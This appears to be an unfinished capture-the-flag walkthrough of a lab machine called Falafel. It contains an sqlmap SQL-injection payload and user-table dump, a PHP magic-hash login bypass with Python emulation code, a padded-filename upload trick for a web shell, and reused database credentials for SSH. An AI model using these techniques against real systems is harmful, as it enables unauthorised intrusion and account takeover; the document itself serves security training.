Machine - Falafel - Linux - Hard - abandoned
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
| 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-enum:
| /login.php: Possible admin folder
|_ /robots.txt: Robots file
|_http-server-header: Apache/2.4.18 (Ubuntu)
Enumeration http
- robots.txt disallows /*.txt, so the interesting files on this host are .txt
- let's fuzz for .txt files xD
- IT@falafel.htb
From: Falafel Network Admin (admin@falafel.htb)
Subject: URGENT!! MALICIOUS SITE TAKE OVER!
Date: November 25, 2017 3:30:58 PM PDT
To: lawyers@falafel.htb, devs@falafel.htb
Delivery-Date: Tue, 25 Nov 2017 15:31:01 -0700
Mime-Version: 1.0
X-Spam-Status: score=3.7 tests=DNS_FROM_RFC_POST, HTML_00_10, HTML_MESSAGE, HTML_SHORT_LENGTH version=3.1.7
X-Spam-Level: ***
A user named "chris" has informed me that he could log into MY account without knowing the password,
then take FULL CONTROL of the website using the image upload feature.
We got a cyber protection on the login form, and a senior php developer worked on filtering the URL of the upload,
so I have no idea how he did it.
Dear lawyers, please handle him. I believe Cyberlaw is on our side.
Dear developers, fix this broken site ASAP.
~admin
using sqlmap (boolean-based blind injection in the username POST parameter of login.php) we got the dump of the users table: id, password hash, role, username
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: username=-8697' OR 1118=1118-- bVwQ&password=admin
[10:32:40] [INFO] retrieved: 1
[10:32:41] [INFO] retrieved: 0e462096931906507119562988736854
[10:32:57] [INFO] retrieved: admin
[10:32:59] [INFO] retrieved: admin
[10:33:01] [INFO] retrieved: 2
[10:33:02] [INFO] retrieved: d4ee02a22fc872e36d9e3751ba72ddc8
[10:33:18] [INFO] retrieved: normal
[10:33:20] [INFO] retrieved: chris
[10:33:23] [INFO] recognized possible
Login as admin
chris's hash (d4ee02a2...) cracks to "juggling"; admin's hash I could not crack…
I think we should be able to log in with the sqli,
but the cracked password "juggling" is the hint: admin's hash starts with 0e and is otherwise all digits, so PHP's loose comparison (==) treats it as the number 0. Any password whose md5 also looks like 0e<digits> compares equal to it, and we log in as admin without ever knowing the real password.
admin 240610708   (md5 = 0e462097431906509019562988736854, another 0e<digits> hash)
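The comparison bug behind the bypass, as an added example (not code from the page or from the Falafel box): a small emulation of PHP's loose == on strings, applied to admin's stored hash from the sqlmap dump. The wordlist is constructed; the only real value in it is 240610708 from the page.

```python
import hashlib
import re

# Admin's stored hash as retrieved by sqlmap on the page
ADMIN_HASH = "0e462096931906507119562988736854"

# PHP 7 "numeric string": optional leading whitespace, sign, digits, optional
# fraction and exponent. Two such strings are compared as numbers by ==.
NUMERIC_STRING = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_loose_equal(a: str, b: str) -> bool:
    """Emulate PHP's == on two strings (PHP 5/7 semantics).

    If both operands are numeric strings they are compared as numbers, so
    "0e462..." == "0e830..." because both are 0 * 10**n == 0.
    Otherwise it is a plain byte-wise string comparison.
    """
    if NUMERIC_STRING.match(a) and NUMERIC_STRING.match(b):
        return float(a) == float(b)
    return a == b


def is_magic_hash(hexdigest: str) -> bool:
    """A 'magic' hash is 0e followed only by decimal digits: numeric, and equal to 0."""
    return re.fullmatch(r"0e\d+", hexdigest) is not None


def check_login(stored_hash: str, candidate: str) -> bool:
    """Model of the vulnerable check: md5($password) == $row['password']."""
    return php_loose_equal(hashlib.md5(candidate.encode()).hexdigest(), stored_hash)


def find_bypass_passwords(stored_hash: str, wordlist):
    """Every word the loose comparison accepts for stored_hash (none for a non-magic hash)."""
    return [w for w in wordlist if check_login(stored_hash, w)]


if __name__ == "__main__":
    # Constructed mini wordlist; "240610708" is the value used on the page.
    words = ["admin", "password", "falafel", "240610708"]
    print(is_magic_hash(ADMIN_HASH), find_bypass_passwords(ADMIN_HASH, words))
```

The fix on the PHP side is a strict comparison (===, or better hash_equals / password_verify); with === the two 0e strings differ byte-wise and the bypass disappears.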
Upload image -> shell. The upload only checks the extension of the name we send, so the name ends in .png; the long A padding is there so the part before .png is exactly as long as the server keeps when saving, and the stored file ends in .php.
python image.py "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCAAABB.php.png"
we got a shell :D
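What the padded filename relies on, as an added illustration (not the page's image.py and not the box's code): a model of an upload handler that validates the submitted name but silently cuts the basename it writes to disk. The allowed-extension set and the 236-character limit are assumptions for the illustration, not values taken from the page; the point is that the padding has to match the real limit exactly.

```python
import os

# Assumed for this illustration (not from the page): the filter only looks at
# the extension of the submitted name, and the saved basename is cut to MAX_NAME_LEN.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif"}
MAX_NAME_LEN = 236  # assumed limit; adjust to what the target actually does


def extension_allowed(filename: str) -> bool:
    """The filter as modelled here: it decides on the *submitted* name."""
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXTENSIONS


def name_on_disk(filename: str, limit: int = MAX_NAME_LEN) -> str:
    """The save step as modelled here: the basename is cut to `limit` characters."""
    return filename[:limit]


def build_truncation_payload(limit: int, real_ext: str = ".php",
                             decoy_ext: str = ".png", pad: str = "A") -> str:
    """Name whose first `limit` characters end in real_ext and which ends in decoy_ext.

    The padding is sized so that the cut lands right after real_ext: the filter
    sees decoy_ext, the disk never does.
    """
    if limit <= len(real_ext):
        raise ValueError("limit too small to fit the real extension")
    return pad * (limit - len(real_ext)) + real_ext + decoy_ext


def works_against(guessed_limit: int, actual_limit: int) -> bool:
    """Does a payload built for guessed_limit survive both steps on a server with actual_limit?"""
    name = build_truncation_payload(guessed_limit)
    return extension_allowed(name) and name_on_disk(name, actual_limit).endswith(".php")


def probe(limit: int) -> dict:
    """Run the padded name through both steps and report what each one sees."""
    name = build_truncation_payload(limit)
    saved = name_on_disk(name, limit)
    return {
        "submitted_ext": os.path.splitext(name)[1],
        "passes_filter": extension_allowed(name),
        "saved_ext": os.path.splitext(saved)[1],
        "saved_len": len(saved),
    }


if __name__ == "__main__":
    print(probe(MAX_NAME_LEN))
    # Off-by-one padding leaves ".php." or ".ph" on disk, neither of which runs.
    print(works_against(MAX_NAME_LEN - 1, MAX_NAME_LEN), works_against(MAX_NAME_LEN + 1, MAX_NAME_LEN))
```

The check the hardened handler needs is the obvious one: decide the extension on the name that will actually be written (after any shortening), or better, generate the stored name yourself and never reuse the client's.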
from www-data to …
define('DB_SERVER', 'localhost:3306');
define('DB_USERNAME', 'moshe');
define('DB_PASSWORD', 'falafelIsReallyTasty');
define('DB_DATABASE', 'falafel');
let's improve our shell with rlwrap
the DB password is reused for the system account: ssh as moshe with falafelIsReallyTasty and voila, we are moshe now :)
from moshe to root?
there is another user yossi
$ id
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)
moshe sits in a lot of groups: adm normally means read access to /var/log, and video normally means read access to the framebuffer device /dev/fb0, both worth checking
Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Distributor ID: Ubuntu
Description: Ubuntu 16.04.3 LTS
Release: 16.04
Codename: xenial
pspy
- nothing (no interesting cron jobs or processes showing up)